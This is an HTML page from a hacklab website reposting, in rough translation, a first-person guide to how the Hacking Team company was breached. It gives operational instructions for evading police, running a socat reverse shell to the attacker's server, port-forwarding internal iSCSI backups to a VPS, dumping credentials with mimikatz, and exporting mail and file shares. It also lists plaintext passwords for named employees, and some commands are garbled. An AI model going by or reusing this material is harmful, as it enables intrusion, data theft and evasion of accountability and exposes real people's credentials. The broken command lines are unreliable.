ht_exploitation_en.html 45 KB

  1. <!DOCTYPE html>
  2. <html lang="en">
  3. <head>
  4. <meta charset="utf-8">
  5. <title>Polybius Hacklab</title>
  6. <meta name="viewport" content="width=device-width, initial-scale=1.0">
  7. <meta name="description" content="open source, hacklab, linux, libertarian, free, open, gpl">
  8. <meta name="author" content="">
  9. <!-- Le styles -->
  10. <link href="css/bootstrap.css" rel="stylesheet">
  11. <style type="text/css">
  12. body {
  13. padding-top: 60px;
  14. padding-bottom: 40px;
  15. }
  16. </style>
  17. <link href="css/bootstrap-responsive.css" rel="stylesheet">
  18. <!-- HTML5 shim, for IE6-8 support of HTML5 elements -->
  19. <!--[if lt IE 9]>
  20. <script src="js/html5shiv.js"></script>
  21. <![endif]-->
  22. <!-- Fav and touch icons -->
  23. <link rel="apple-touch-icon-precomposed" sizes="144x144" href="ico/apple-touch-icon-144-precomposed.png">
  24. <link rel="apple-touch-icon-precomposed" sizes="114x114" href="ico/apple-touch-icon-114-precomposed.png">
  25. <link rel="apple-touch-icon-precomposed" sizes="72x72" href="ico/apple-touch-icon-72-precomposed.png">
  26. <link rel="apple-touch-icon-precomposed" href="ico/apple-touch-icon-57-precomposed.png">
  27. <link rel="shortcut icon" href="ico/favicon.png">
  28. </head>
  29. <body>
  30. <div class="navbar navbar-inverse navbar-fixed-top">
  31. <div class="navbar-inner">
  32. <div class="container">
  33. <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">
  34. <span class="icon-bar"></span>
  35. <span class="icon-bar"></span>
  36. <span class="icon-bar"></span>
  37. </button>
  38. <a class="brand" href="#">Polybius</a>
  39. <div class="nav-collapse collapse">
  40. <ul class="nav">
  41. <li><a href="index.html">Home</a></li>
  42. <li><a href="about.html">About</a></li>
  43. <li><a href="materiali.html">Help Us</a></li>
  44. <!--li><a href="#about">About</a></li>
  45. <li><a href="#contact">Contact</a></li-->
  46. <li class="dropdown">
  47. <a href="#" class="dropdown-toggle" data-toggle="dropdown">Docos<b class="caret"></b></a>
  48. <ul class="dropdown-menu">
  49. <li class="active"><a href="#">{en}Phineas Fisher - Pi$$ing on HT</a></li>
  50. <li><a href="PHZine00_it.html">{it}PHZine00</a></li>
  51. <!--li class="divider"></li>
  52. <li class="nav-header">Nav header</li>
  53. <li><a href="#">Separated link</a></li>
  54. <li><a href="#">One more separated link</a></li-->
  55. </ul>
  56. </li>
  57. </ul>
  58. <!--form class="navbar-form pull-right">
  59. <input class="span2" type="text" placeholder="Email">
  60. <input class="span2" type="password" placeholder="Password">
  61. <button type="submit" class="btn">Sign in</button>
  62. </form-->
  63. </div><!--/.nav-collapse -->
  64. </div>
  65. </div>
  66. </div>
  67. <div class="container">
  68. <!-- Example row of columns -->
  69. <div class="row">
  70. <div class="span11">
  71. <h1>{en} HackBack pissing on Hacking Team</h1>
  72. Here is the report of how Hacking Team got hacked.
  73. We cut and pasted it here because it is a good example of what ethical hacking is and of what it means to carry out a penetration test (Information Gathering, Vulnerability Assessment, Exploitation, Privilege Escalation, Maintaining Access, Reporting), as well as a funny and interesting "technical novel": strongly recommended reading.<br>
  74. The original here: <a href="http://pastebin.com/0SNSvyjJ">http://pastebin.com/0SNSvyjJ</a>
  75. <p><pre><code>
  76. _ _ _ ____ _ _
  77. | | | | __ _ ___| | __ | __ ) __ _ ___| | _| |
  78. | |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / |
  79. | _ | (_| | (__| < | |_) | (_| | (__| <|_|
  80. |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)
  81. A DIY Guide
  82. ,-._,-._
  83. _,-\ o O_/;
  84. / , ` `|
  85. | \-.,___, / `
  86. \ `-.__/ / ,.\
  87. / `-.__.-\` ./ \'
  88. / /| ___\ ,/ `\
  89. ( ( |.-"` '/\ \ `
  90. \ \/ ,, | \ _
  91. \| o/o / \.
  92. \ , / /
  93. ( __`;-;'__`) \\
  94. `//'` `||` `\
  95. _// || __ _ _ _____ __
  96. .-"-._,(__) .(__).-""-. | | | | |_ _| |
  97. / \ / \ | | |_| | | | |
  98. \ / \ / | | _ | | | |
  99. `'-------` `--------'` __| |_| |_| |_| |__
  100. #antisec
  101. - [1 - Introduction] ------------------------------------------- ----------------
  102. You'll notice the change of language since the last edition [1]. The
  103. English-speaking world already has plenty of books, talks, guides, and
  104. information about hacking. In that world there are many hackers better than me,
  105. but unfortunately they squander their knowledge working for "defense"
  106. contractors and intelligence agencies, protecting banks and corporations and
  107. defending the established order. Hacker culture was born in the US as a
  108. counterculture, but that origin survives only in its aesthetics - the rest has
  109. been assimilated. At least they can wear a t-shirt, dye their hair blue,
  110. use their hacker nicknames, and feel like rebels while working for the
  111. system.
  112. Before someone had to sneak into the offices to filter documents [2].
  113. a gun to rob a bank was needed. Today you can do it from
  114. bed with a laptop in hands [3] [4]. As the CNT said after the
  115. Gamma hack Group: "we try to take another step forward with new
  116. forms of struggle "[5]. The hack is a powerful tool, let us learn and
  117. let's fight!
  118. [1] http://pastebin.com/raw.php?i=cRYvK4jb
  119. [2] https://en.wikipedia.org/wiki/Citizens%27_Commission_to_Investigate_the_FBI
  120. [3] http://www.aljazeera.com/news/2015/09/algerian-hacker-hero-hoodlum-150921083914167.html
  121. [4] https://securelist.com/files/2015/02/Carbanak_APT_eng.pdf
  122. [5] http://madrid.cnt.es/noticia/consideraciones-sobre-el-ataque-informatico-a-gamma-group
  123. - [2 - Hacking Team] ------------------------------------------ ----------------
  124. Hacking Team was a company that helped governments to hack and spy on
  125. journalists, activists, political opponents, and other threats to their power
  126. [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11]. And, very occasionally, criminals and
  127. terrorists [12]. Vincenzetti, the CEO, liked to end his emails with
  128. the fascist slogan "boia chi molla". "Boia chi vende RCS" would be more fitting.
  129. They also claimed to have technology to solve the "problem" of Tor and
  130. darknet [13]. But seeing that I still have my freedom, I have my doubts about
  131. their effectiveness.
  132. [1] http://www.animalpolitico.com/2015/07/el-gobierno-de-puebla-uso-el-software-de-hacking-team-para-espionaje-politico/
  133. [2] http://www.prensa.com/politica/claves-entender-Hacking-Team-Panama_0_4251324994.html
  134. [3] http://www.24-horas.mx/ecuador-espio-con-hacking-team-a-opositor-carlos-figueroa/
  135. [4] https://citizenlab.org/2012/10/backdoors-are-forever-hacking-team-and-the-targeting-of-dissent/
  136. [5] https://citizenlab.org/2014/02/hacking-team-targeting-ethiopian-journalists/
  137. [6] https://citizenlab.org/2015/03/hacking-team-reloaded-us-based-ethiopian-journalists-targeted-spyware/
  138. [7] http://focusecuador.net/2015/07/08/hacking-team-rodas-paez-tiban-torres-son-espiados-en-ecuador/
  139. [8] http://www.pri.org/stories/2015-07-08/these-ethiopian-journalists-exile-hacking-team-revelations-are-personal
  140. [9] https://theintercept.com/2015/07/07/leaked-documents-confirm-hacking-team-sells-spyware-repressive-countries/
  141. [10] http://www.wired.com/2013/06/spy-tool-sold-to-governments/
  142. [11] http://www.theregister.co.uk/2015/07/13/hacking_team_vietnam_apt/
  143. [12] http://www.ilmessaggero.it/primopiano/cronaca/yara_bossetti_hacking_team-1588888.html
  144. [13] http://motherboard.vice.com/en_ca/read/hacking-team-founder-hey-fbi-we-can-help-you-crack-the-dark-web
  145. Unfortunately, our world is upside down. Enriches you do bad things
  146. and imprisons you do good things. Fortunately, thanks to the work
  147. hard for people such as "Tor project" [1], you can keep you from getting into the
  148. jail by a few simple guidelines:
  149. 1) Encrypt your hard drive [2]
  150. I guess when the police arrive to impound your computer,
  151. mean you've already made many mistakes, but better safe
  152. than cure.
  153. 2) Use a virtual machine and all traffic routed by Tor
  154. This accomplishes two things. First, that all connections are anonymized to
  155. through the Tor network. Second, keep personal life and anonymous life
  156. on different computers it helps you not to mix by accident.
  157. You can use projects like Whonix [3], Tails [4], Qubes TorVM [5], or something
  158. personalized [6]. Here [7] there is a detailed comparison.
  159. 3) (Optional) Do not connect directly to the Tor network
  160. Tor is not the panacea. You can correlate the hours that you are connected
  161. Tor with the hours that your nickname is active hacker. There have also been
  162. successful attacks against the network [8]. You can connect to the Tor network through
  163. wifi others. Wifislax [9] is a Linux distribution with many
  164. tools to get wifi. Another option is to connect to a VPN or
  165. bridge node [10] before Tor, but that is less secure because your hacking
  166. activity can still be correlated with the internet activity of
  167. your home (for example, this was used as evidence against Jeremy Hammond
  168. [11]).
  169. The reality is that even though Tor is not perfect, it works quite well.
  170. When I was young and reckless, did many things without any protection (me
  171. referring to hacking) other than Tor, police made it impossible
  172. investigate, and I've never had problems.
  173. [1] https://www.torproject.org/
  174. [2] https://info.securityinabox.org/es/chapter-4
  175. [3] https://www.whonix.org/
  176. [4] https://tails.boum.org/
  177. [5] https://www.qubes-os.org/doc/privacy/torvm/
  178. [6] https://trac.torproject.org/projects/tor/wiki/doc/TransparentProxy
  179. [7] https://www.whonix.org/wiki/Comparison_with_Others
  180. [8] https://blog.torproject.org/blog/tor-security-advisory-relay-early-traffic-confirmation-attack/
  181. [9] http://www.wifislax.com/
  182. [10] https://www.torproject.org/docs/bridges.html.en
  183. [11] http://www.documentcloud.org/documents/1342115-timeline-correlation-jeremy-hammond-and-anarchaos.html
  184. ---- [3.1 - Infrastructure] ----------------------------------------- ----------
  185. I don't hack directly from Tor exit relays. They are blacklisted,
  186. they are very slow, and they cannot receive reverse connections. Tor serves to
  187. protect my anonymity while I connect to the infrastructure I use for
  188. hacking, which consists of:
  189. 1) Domain Names
  190. Addresses used for command and control (C & C), and for tunnels
  191. DNS for insured egress.
  192. 2) Stable Servers
  193. It serves to C & C servers to receive reverse shells, to launch
  194. attacks and keep the loot.
  195. 3) Servers Hacked
  196. They serve as pivots to hide the IP of stable servers, and
  197. when I want a quick connection without pivot. For example scan ports,
  198. scan the whole internet, download a database with SQL injection,
  199. etc.
  200. Obviously you have to pay anonymously, as bitcoin (if you use it with
  201. watch out).
  202. ---- [3.2 - Attribution] ----------------------------------------- ---------------
  203. The news often reports that an attack has been attributed to a group of
  204. government hackers (the "APTs"), because they always use the same
  205. tools, leave the same fingerprints, and even use the same
  206. infrastructure (domains, email addresses, etc). They are careless because they can hack
  207. without legal consequences.
  208. I did not want to make the police's work easier by letting them relate the Hacking
  209. Team hack to the hacks and nicknames of my daily work as a black hat
  210. hacker. So I used new servers and domains, registered with new email addresses
  211. and paid for with new bitcoin addresses. In addition, I used only public
  212. tools and things that I wrote especially for this attack, and I changed my way
  213. of doing some things so as not to leave my normal forensic trace.
  214. - [4 - Gathering Information] ------------------------------------------ ---------
  215. Although it can be tedious, this stage is very important, because the
  216. larger the attack surface, the easier it is to find a flaw in some
  217. part of it.
  218. ---- [4.1 - Technical Information] ---------------------------------------- -------
  219. Some tools and techniques are:
  220. 1) Google
  221. You can find many unexpected things with a couple of good searches
  222. picked. For example, the identity of DPR [1]. The bible of how to use
  223. google to hack is the book "Google Hacking for Penetration Testers".
  224. You can also find a brief summary in Spanish in [2].
  225. 2) Enumeration of subdomains
  226. Often the primary domain of a company is hosted by a third party, and
  227. you are getting the IP ranges of the company thanks to subdomains as
  228. mx.company.com, ns1.company.com etc. Also, sometimes there are things that should not be
  229. be exposed to "hidden" subdomains. Useful tools for
  230. discover domains and subdomains are fierce [3], theHarvester [4] and
  231. recon-ng [5].
  232. 3) reverse lookups and searches whois
  233. With a reverse search using the whois information of a domain or range
  234. IPs of a company, you can find others of their domains and ranges
  235. IPs. To my knowledge, there is no free way to do reverse lookups
  236. whois, apart from a "hack" with google:
  237. "Via della Moscova 13" site: www.findip-address.com
  238. "Via della Moscova 13" site: domaintools.com
  239. 4) Port scanning and fingerprinting
  240. Unlike the other techniques, this one talks to the company's
  241. servers. I include it in this section because it is not an attack, it only
  242. gathers information. The company's IDS may generate an alert on a
  243. port scan, but you do not have to worry because the whole internet
  244. is constantly being scanned.
  245. For scanning, nmap [6] is precise, and it can fingerprint most of the
  246. services discovered. For companies with very large ranges of IPs,
  247. ZMap [7] or masscan [8] are fast. WhatWeb [9] or BlindElephant [10]
  248. can fingerprint websites.
  249. [1] http://www.nytimes.com/2015/12/27/business/dealbook/the-unsung-tax-agent-who-put-a-face-on-the-silk-road.html
  250. [2] http://web.archive.org/web/20140610083726/http://www.soulblack.com.ar/repo/papers/hackeando_con_google.pdf
  251. [3] http://ha.ckers.org/fierce/
  252. [4] https://github.com/laramies/theHarvester
  253. [5] https://bitbucket.org/LaNMaSteR53/recon-ng
  254. [6] https://nmap.org/
  255. [7] https://zmap.io/
  256. [8] https://github.com/robertdavidgraham/masscan
  257. [9] http://www.morningstarsecurity.com/research/whatweb
  258. [10] http://blindelephant.sourceforge.net/
  259. ---- [4.2 - Social Information] ---------------------------------------- --------
  260. For social engineering, it is very useful to collect information about
  261. employees, their roles, contact information, operating system, browser,
  262. plugins, software, etc. Some resources are:
  263. 1) Google
  264. Here too, it is the most useful tool.
  265. 2) theHarvester and recon-ng
  266. I have already mentioned in the previous section, but have much more
  267. functionality. You can find a lot of information quickly and
  268. automated. Worth reading all documentation.
  269. 3) LinkedIn
  270. You can find much information about the employees here. The
  271. Company recruiters are more likely to accept your requests.
  272. 4) Data.com
  273. Formerly known as jigsaw. You have the contact information of many
  274. employees.
  275. 5) Metadata file
  276. You can find lots of information about employees and their systems
  277. metadata files that the company has published. helpful Tools
  278. to find files on the website of the company and extract
  279. Metadata is metagoofil [1] and FOCA [2].
  280. [1] https://github.com/laramies/metagoofil
  281. [2] https://www.elevenpaths.com/es/labstools/foca-2/index.html
  282. - [5 - Entering the Network] ---------------------------------------- ------------
  283. There are several ways to make entry. Since the method I used for hacking
  284. team is rare and much more work than is usually necessary,
  285. I'll talk a bit about the two most common methods, I recommend trying
  286. First.
  287. ---- [5.1 - Social Engineering] ---------------------------------------- ---------
  288. Social engineering, spear phishing specifically, is responsible for
  289. most hacking today. For an introduction in Spanish, see [1].
  290. For more information in English, see [2] (the third part, "Targeted
  291. Attacks"). For amusing social engineering anecdotes from past
  292. generations, see [3]. I did not want to try spear phishing against Hacking Team,
  293. because their business is helping governments spear phish their opponents.
  294. Therefore there was a much higher risk that Hacking Team would recognize and
  295. investigate the attempt.
  296. [1] http://www.hacknbytes.com/2016/01/apt-pentest-con-empire.html
  297. [2] http://blog.cobaltstrike.com/2015/09/30/advanced-threat-tactics-course-and-notes/
  298. [3] http://www.netcomunity.com/lestertheteacher/doc/ingsocial1.pdf
  299. ---- [5.2 - Buy Access] ---------------------------------------- ------------
  300. Thanks to hardworking Russians and their exploit kits, traffic sellers, and
  301. bot herders, many companies already have compromised computers within
  302. their networks. Almost all of the Fortune 500, with their huge networks, have some
  303. bots already inside. However, Hacking Team is a very small company, and
  304. most of its employees are experts in computer security, so there was
  305. little chance that they were already compromised.
  306. ---- [5.3 - Technical Operations] ---------------------------------------- -------
  307. After hacking Gamma Group, I described a process to search
  308. vulnerabilities [1]. Hacking Team has a range of public IP:
  309. inetnum: 93.62.139.32 - 93.62.139.47
  310. descr: HT public subnet
  311. Hacking Team had very little exposed to the internet. For example, unlike
  312. Gamma Group, their customer site requires a client
  313. certificate to connect. What they had was their main website (a Joomla blog
  314. in which Joomscan [2] reveals no serious flaw), a mail server, a
  315. pair of routers, two VPN devices, and a spam filtering device.
  316. So I had three options: find a 0day in Joomla, find a 0day in
  317. postfix, or find a 0day in one of the embedded systems. A 0day in an
  318. embedded system seemed the most attainable option, and after two weeks
  319. of reverse engineering work, I got a remote root exploit. Given that the
  320. vulnerabilities have not yet been patched, I will not give more details.
  321. For more information on how to find these vulnerabilities, see
  322. [3] and [4].
  323. [1] http://pastebin.com/raw.php?i=cRYvK4jb
  324. [2] http://sourceforge.net/projects/joomscan/
  325. [3] http://www.devttys0.com/
  326. [4] https://docs.google.com/presentation/d/1-mtBSka1ktdh8RHxo2Ft0oNNlIp7WmDA2z9zzHpon8A
  327. - [6 - Be Prepared] ------------------------------------------ -------------
  328. I did a lot of work and testing before using the exploit against Hacking Team.
  329. I wrote a backdoored firmware, and compiled several post-exploitation
  330. tools for the embedded system. The backdoor serves to protect the
  331. exploit: using the exploit only once and then returning through the backdoor makes
  332. it harder to find and patch the vulnerabilities.
  333. The post-exploitation tools I had prepared were:
  334. 1) busybox
  335. For all common UNIX utilities that the system did not.
  336. 2) nmap
  337. To scan and fingerprint the internal network of Hacking Team.
  338. 3) Responder.py
  339. The most useful tool to attack Windows networks when you have access to
  340. the internal network but do not have a domain user.
  341. 4) Python
  342. To run Responder.py
  343. 5) tcpdump
  344. To snoop traffic.
  345. 6) dsniff
  346. Weak passwords to spy protocols such as ftp, and to make
  347. ARP spoofing. I wanted to use ettercap, written by the same ALOR and naga
  348. Hacking Team, but it was difficult to compile for the system.
  349. 7) socat
  350. For a comfortable shell with pty:
  351. my_server: socat file: `tty`, raw, echo = 0 tcp-listen: mi_puerto
  352. Hacked system: socat exec: 'bash -li' pty, stderr, setsid, SIGINT, heal \
  353. tcp: my_server: I mi_puerto
  354. And for many other things, it is a Swiss Army knife of networking. See section
  355. Examples of documentation.
  356. 8) screen
  357. As socat pty is not strictly necessary, but I wanted to feel
  358. at home in networks Hacking Team.
  359. 9) a SOCKS proxy server
  360. To use with proxychains to access the internal network with any
  361. another program.
  362. 10) tgcd
  363. To forward ports, as SOCKS server through the firewall.
  364. [1] https://www.busybox.net/
  365. [2] https://nmap.org/
  366. [3] https://github.com/SpiderLabs/Responder
  367. [4] https://github.com/bendmorris/static-python
  368. [5] http://www.tcpdump.org/
  369. [6] http://www.monkey.org/~dugsong/dsniff/
  370. [7] http://www.dest-unreach.org/socat/
  371. [8] https://www.gnu.org/software/screen/
  372. [9] http://average-coder.blogspot.com/2011/09/simple-socks5-server-in-c.html
  373. [10] http://tgcd.sourceforge.net/
  374. The worst that could happen was that my backdoor or post-exploitation tools
  375. would leave the system unstable and cause an employee to investigate.
  376. So I spent a week testing my exploit, backdoor, and post-exploitation
  377. tools on the networks of other vulnerable companies before entering
  378. Hacking Team's network.
  379. - [7 - Look and Listen] ----------------------------------------- ----------
  380. Now inside the internal network, I want to take a look around and think before taking
  381. the next step. I start Responder.py in analysis mode (-A, to listen without
  382. sending poisoned responses), and do a slow scan with nmap.
  383. - [8 - NoSQL databases] ---------------------------------------- ----------
  384. NoSQL, or rather NoAuthentication, has been a great gift to the hacker
  385. community [1]. Just when I was worried that they had finally patched all the
  386. authentication bypass bugs in MySQL [2] [3] [4] [5], new databases that
  387. lack authentication by design came into fashion. Nmap finds a few on Hacking
  388. Team's internal network:
  389. 27017 / tcp open MongoDB MongoDB 2.6.5
  390. | mongodb-databases:
  391. | ok = 1
  392. | totalSizeMb = 47547
  393. | totalSize = 49856643072
  394. ...
  395. | _ Version = 2.6.5
  396. 27017 / tcp open MongoDB MongoDB 2.6.5
  397. | mongodb-databases:
  398. | ok = 1
  399. | totalSizeMb = 31987
  400. | totalSize = 33540800512
  401. | DATABASES
  402. ...
  403. | _ Version = 2.6.5
  404. They were the databases for RCS test instances. The audio that RCS
  405. records is stored in MongoDB with GridFS. The audio folder in the torrent [6]
  406. comes from this. Unwittingly, they spied on themselves.
  407. [1] https://www.shodan.io/search?query=product%3Amongodb
  408. [2] https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql
  409. [3] http://archives.neohapsis.com/archives/vulnwatch/2004-q3/0001.html
  410. [4] http://downloads.securityfocus.com/vulnerabilities/exploits/hoagie_mysql.c
  411. [5] http://archives.neohapsis.com/archives/bugtraq/2000-02/0053.html
  412. [6] https://ht.transparencytoolkit.org/audio/
  413. - [9 - Crossed Cables] ------------------------------------------ -------------
  414. Although it was fun to listen to recordings and view webcam images of Hacking
  415. Team developing its malware, it was not very useful. Their insecure
  416. backups were the vulnerability that opened their doors. According to their
  417. documentation [1], their iSCSI devices should be on a separate network,
  418. but nmap finds some in their 192.168.1.200/24 subnet:
  419. Nmap scan report for ht-synology.hackingteam.local (192.168.200.66)
  420. ...
  421. 3260 / tcp open iscsi?
  422. | iscsi-info:
  423. | Target: iqn.2000-01.com.synology: ht-synology.name
  424. | Address: 192.168.200.66:3260,0
  425. | _ Authentication: No authentication required
  426. Nmap scan report for synology-backup.hackingteam.local (192.168.200.72)
  427. ...
  428. 3260 / tcp open iscsi?
  429. | iscsi-info:
  430. | Target: iqn.2000-01.com.synology: synology-backup.name
  431. | Address: 10.0.1.72:3260,0
  432. | Address: 192.168.200.72:3260,0
  433. | _ Authentication: No authentication required
  434. iSCSI requires a kernel module, and compile it would have been difficult for the
  435. embedded system. I forwarded the port to mount from a VPS:
  436. VPS: tgcd -L -p 3260 -q 42838
  437. Embedded system: tgcd -C -s -c 192.168.200.72:3260 VPS_IP: 42838
  438. VPS: iscsiadm discovery -m -p -t 127.0.0.1 SendTargets
  439. Now you find the name iqn.2000-01.com.synology iSCSI but has problems
  440. when mounting because he believes his address is 192.168.200.72 instead of
  441. 127.0.0.1
  442. The way I solved was:
  443. iptables -t nat -A OUTPUT -d -j 192.168.200.72 DNAT --to-destination 127.0.0.1
  444. And now after:
  445. -m node iscsiadm --targetname = iqn.2000-01.com.synology: 192.168.200.72 -p synology-backup.name --login
  446. ... The device file appears! We ride:
  447. vmfs-fuse -o ro / dev / sdb1 / mnt / tmp
  448. and we find backups of multiple virtual machines. The server
  449. Exchange seems most interesting. It is too large to download,
  450. but we can mount remote and look for interesting files:
  451. $ Losetup / dev / loop0 Exchange.hackingteam.com-flat.vmdk
  452. $ Fdisk -l / dev / loop0
  453. / Dev / loop0p1 2048 1258287103 629142528 7 HPFS / NTFS / exFAT
  454. then the offset is 2048 * 512 = 1048576
  455. 1048576 $ losetup -o / dev / loop1 / dev / loop0
  456. $ Mount -o ro / dev / loop1 / mnt / exchange /
  457. now in / mnt / exchange / WindowsImageBackup / EXCHANGE / Backup 172311 10/14/2014
  458. We find the hard drive of the virtual machine, and assemble:
  459. vdfuse -r -t -f VHD f0f78089-D28a-11e2-a92c-005056996a44.vhd / mnt / vhd-disk /
  460. mount -o loop / mnt / vhd-disk / Partition1 / mnt / part1
  461. ... And finally we unpacked the doll and we can see all
  462. the old Exchange server files in / mnt / part1
  463. [1] https://ht.transparencytoolkit.org/FileServer/FileServer/Hackingteam/InfrastrutturaIT/Rete/infrastruttura%20ht.pdf
  464. - [10 - Backup to Domain Administrator] ---------------------
  465. What interests me most in the backup is seeing whether it contains a password
  466. or hash that can be used to access the current server. I use pwdump,
  467. cachedump, and lsadump [1] on the registry files. lsadump finds the
  468. password of the besadmin service account:
  469. _SC_BlackBerry MDS Connection Service
  470. 0000 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
  471. 0010 62 00 65 00 73 00 33 00 32 00 36 00 37 00 38 00 b.e.s.3.2.6.7.8.
  472. 0020 21 00 21 00 21 00 00 00 00 00 00 00 00 00 00 00!.!.! ...........
  473. proxychains [2] use the SOCKS server and embedded system
  474. smbclient [3] to check the password:
  475. proxychains smbclient //192.168.100.51/c$ '-U' hackingteam.local / besadmin% bes32678 !!! '
  476. !Works! Besadmin password is still valid, and is an administrator
  477. local. I use my proxy and psexec_psh metasploit [4] for a session
  478. of meterpreter. Then I migrate to a 64-bit process, "load kiwi" [5]
  479. "Creds_wdigest", and I have many passwords, including the Administrator
  480. domain:
  481. HACKINGTEAM BESAdmin bes32678 !!!
  482. HACKINGTEAM Administrator uu8dd8ndd12!
  483. HACKINGTEAM c.pozzi P4ssword <---- sysadmin go!
  484. M.romeo HACKINGTEAM ioLK / (90
  485. L.guerra HACKINGTEAM 4luc@=.=
  486. HACKINGTEAM D.Martinez W4tudul3sp
  487. HACKINGTEAM g.russo GCBr0s0705!
  488. A.scarafile HACKINGTEAM Cd4432996111
  489. HACKINGTEAM r.viscardi Ht2015!
  490. HACKINGTEAM a.mino A! E $$ andra
  491. HACKINGTEAM m.bettini Ettore & Bella0314
  492. M.luppi HACKINGTEAM Blackou7
  493. HACKINGTEAM s.gallucci 1S9i8m4o!
  494. HACKINGTEAM d.milan set! Dob66
  495. HACKINGTEAM w.furlan Blu3.B3rry!
  496. HACKINGTEAM d.romualdi Rd13136f @ #
  497. HACKINGTEAM l.invernizzi L0r3nz0123!
  498. HACKINGTEAM e.ciceri 2O2571 & 2E
  499. HACKINGTEAM e.rabe erab @ 4HT!
  500. [1] https://github.com/Neohapsis/creddump7
  501. [2] http://proxychains.sourceforge.net/
  502. [3] https://www.samba.org/
  503. [4] http://ns2.elhacker.net/timofonica/manuales/Manual_de_Metasploit_Unleashed.pdf
  504. [5] https://github.com/gentilkiwi/mimikatz
  505. - [11 - Downloading Mail] ----------------------------------------- ------
  506. Now that I have the password for the domain administrator, I have access to
  507. the mail, the heart of the company. Because every step I take carries a
  508. risk of detection, I download the mail before exploring further.
  509. Powershell makes it easy [1]. Interestingly, I found a bug in its handling
  510. of dates. After getting the mail, it took me a couple more weeks to
  511. get the source code and everything else, so I returned occasionally to
  512. download the new mail. The server was Italian, with dates in the format
  513. day / month / year. I used:
  514. -ContentFilter {(Received -ge '05 / 06/2015 ') -or (Sent -ge '05 / 06/2015')}
  515. with New-MailboxExportRequest to download the new mail (in this
  516. case, all mail since June 5). The problem is that it says
  517. the date is invalid if the day is greater than 12 (I guess this is because
  518. in the US the month comes first, and the month cannot be greater than 12). It looks like
  519. Microsoft's engineers have only tested their software with their own
  520. regional configuration.
  521. [1] http://www.stevieg.org/2010/07/using-the-exchange-2010-sp1-mailbox-export-features-for-mass-exports-to-pst/
  522. - [12 - Downloading Files] ------------------------------------------ -------
  523. Now I'm a domain administrator, I also began to download
  524. shares using my proxy and -Tc smbclient option for
  525. example:
  526. proxychains smbclient //192.168.1.230/FAE DiskStation '\
  527. -U 'HACKINGTEAM / Administrator% uu8dd8ndd12!' -TC FAE_DiskStation.tar '*'
  528. That is how I downloaded the Amministrazione, FAE DiskStation, and FileServer folders
  529. that are in the torrent.
  530. - [13 - Introduction to Hacking Windows Domain] -----------------------
  531. Before continue telling the story of the Culiao Non-Windows, it should say something
  532. knowledge to attack Windows networks.
  533. ---- [13.1 - Lateral Movement] ---------------------------------------- -------
  534. I will give a brief overview of the techniques for spreading within a Windows
  535. network. The techniques for remote execution require the password or
  536. hash of a local administrator on the target. By far the most common way
  537. to get such credentials is to use mimikatz [1], especially
  538. sekurlsa::logonpasswords and sekurlsa::msv, on computers where you already have
  539. administrative access. The "in situ" movement techniques also require
  540. administrative privileges (except for runas). The most important
  541. privilege escalation tools are PowerUp [2] and bypassuac [3].
  542. [1] https://adsecurity.org/?page_id=1821
  543. [2] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp
  544. [3] https://github.com/PowerShellEmpire/Empire/blob/master/data/module_source/privesc/Invoke-BypassUAC.ps1
  545. Remote movement:
  546. 1) psexec
  547. The basic, proven way of moving around Windows networks. You can use
  548. psexec [1], winexe [2], psexec_psh from metasploit [3], invoke_psexec from
  549. powershell empire [4], or the Windows command "sc" [5]. For the metasploit
  550. module, powershell empire, and pth-winexe [6], it is enough to know the hash
  551. without knowing the password. It is the most universal way (it works on any
  552. computer with port 445 open), but also the least cautious
  553. one. It shows up in the event log as event 7045, "Service
  554. Control Manager". In my experience it has never been noticed during a
  555. hack, but sometimes it is noticed afterwards and helps investigators understand
  556. what the hacker did.
  557. 2) WMI
  558. The most cautious way. The WMI service is enabled on all
  559. Windows computers, but, except on servers, the firewall blocks it by
  560. default. You can use wmiexec.py [7], pth-wmis [6] (here is a
  561. demonstration of wmiexec and pth-wmis [8]), invoke_wmi from powershell empire
  562. [9], or the Windows command wmic [5]. All of them except wmic need only the
  563. hash.
  564. 3) PSRemoting [10]
  565. It is disabled by default, and I do not advise enabling new
  566. protocols that are not needed. But if the sysadmin has already enabled it,
  567. it is very convenient, especially if you use powershell for everything (and yes,
  568. you should use powershell for almost everything; this will change [11] with powershell 5
  569. and Windows 10, but today powershell makes it easy to do everything in RAM,
  570. evade antivirus, and leave few traces).
  571. 4) Scheduled Tasks
  572. You can run programs remotely with at and schtasks [5]. It works in the
  573. same situations as psexec, and it also leaves known traces [12].
  574. 5) GPO
  575. If all these protocols are disabled or blocked by the
  576. firewall, once you are domain administrator you can use GPO
  577. to push a logon script, install an msi, run a scheduled task
  578. [13], or, as we will see with the computer of Mauro Romeo (sysadmin of Hacking
  579. Team), enable WMI and open the firewall via GPO.
  580. [1] https://technet.microsoft.com/en-us/sysinternals/psexec.aspx
  581. [2] https://sourceforge.net/projects/winexe/
  582. [3] https://www.rapid7.com/db/modules/exploit/windows/smb/psexec_psh
  583. [4] http://www.powershellempire.com/?page_id=523
  584. [5] http://blog.cobaltstrike.com/2014/04/30/lateral-movement-with-high-latency-cc/
  585. [6] https://github.com/byt3bl33d3r/pth-toolkit
  586. [7] https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.py
  587. [8] https://www.trustedsec.com/june-2015/no_psexec_needed/
  588. [9] http://www.powershellempire.com/?page_id=124
  589. [10] http://www.maquinasvirtuales.eu/ejecucion-remota-con-powershell/
  590. [11] https://adsecurity.org/?p=2277
  591. [12] https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems
  592. [13] https://github.com/PowerShellEmpire/Empire/blob/master/lib/modules/lateral_movement/new_gpo_immediate_task.py
  593. Movement "in situ"
  594. 1) Impersonating Tokens
  595. Once you have administrative access to a computer, you can use the
  596. tokens of other users to access resources in the domain. Two
  597. tools for doing this are incognito [1] and the token::* commands of
  598. mimikatz [2].
  599. 2) MS14-068
  600. You can take advantage of a validation flaw in Kerberos to generate a
  601. domain administrator ticket [3] [4] [5].
  602. 3) Pass the Hash
  603. If you have a user's hash but the user is not logged on, you can use
  604. sekurlsa::pth [2] to get a ticket for that user.
  605. 4) Process Injection
